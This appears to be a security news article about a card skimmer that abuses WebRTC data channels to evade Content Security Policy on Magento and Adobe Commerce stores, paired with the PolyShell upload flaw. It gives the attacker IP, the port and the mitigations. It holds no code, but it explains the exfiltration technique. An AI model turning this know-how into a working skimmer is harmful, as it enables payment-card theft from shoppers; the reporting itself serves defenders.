A new payment skimmer uses WebRTC data channels to steal payment information from e-commerce sites, bypassing Content Security Policy (CSP) protections and leveraging the PolyShell vulnerability in Magento and Adobe Commerce platforms.
Cybersecurity researchers have uncovered a sophisticated new payment skimmer that leverages WebRTC data channels to steal payment information from e-commerce websites, marking a significant evolution in web-based financial fraud.
The PolyShell Vulnerability Connection
The attack exploits a recently discovered vulnerability called PolyShell, which affects both Magento Open Source and Adobe Commerce platforms. This critical flaw allows unauthenticated attackers to upload arbitrary executables via the REST API and achieve code execution on vulnerable systems.
Since March 19, 2026, PolyShell has been under mass exploitation, with over 50 IP addresses actively scanning for vulnerable targets. Security firm Sansec reports finding PolyShell attacks on 56.7% of all vulnerable stores, highlighting the widespread nature of this threat.
Adobe released a fix for PolyShell in version 2.4.9-beta1 on March 10, 2026, but this patch has not yet reached production versions of the software, leaving many sites exposed.
How the WebRTC Skimmer Works
The skimmer operates as a self-executing script that establishes a WebRTC peer connection to a hard-coded IP address (202.181.177.177) over UDP port 3479. Once connected, it retrieves JavaScript code that's injected into the web page to capture payment information.
What makes this attack particularly concerning is its ability to bypass Content Security Policy (CSP) directives. Traditional security measures that block unauthorized HTTP connections remain ineffective against WebRTC-based exfiltration.
Why WebRTC Makes Detection Harder
WebRTC DataChannels operate over DTLS-encrypted UDP rather than HTTP, making the stolen data invisible to network security tools that inspect HTTP traffic. This encryption means that even stores with strict CSP policies remain vulnerable to data exfiltration.
Sansec notes that "A store with a strict CSP that blocks all unauthorized HTTP connections is still wide open to WebRTC-based exfiltration." The traffic itself is also harder to detect, as WebRTC operates outside the scope of traditional web security monitoring.
Targeted Attack on Automotive E-Commerce
The vulnerability was discovered during an investigation of a car manufacturer's e-commerce website, demonstrating that even high-profile, presumably well-secured sites remain vulnerable to these advanced attacks.
Mitigation Strategies
Site owners are advised to take several protective measures:
- Block access to the "pub/media/custom_options/" directory
- Scan stores for web shells, backdoors, and other malware
- Monitor for unusual UDP traffic on port 3479
- Apply available patches as soon as they reach production versions
The Broader Implications
This attack represents a concerning trend in web-based financial fraud, where attackers continuously evolve their techniques to bypass existing security controls. The combination of a remote code execution vulnerability with a novel exfiltration method creates a potent threat that could affect thousands of e-commerce sites worldwide.
The use of WebRTC for malicious purposes demonstrates how legitimate web technologies can be repurposed for cybercrime, requiring security professionals to adapt their defensive strategies accordingly.
As e-commerce continues to grow, the stakes for protecting payment data become increasingly critical, making awareness of these evolving threats essential for both merchants and security practitioners.
Comments
Please log in or register to join the discussion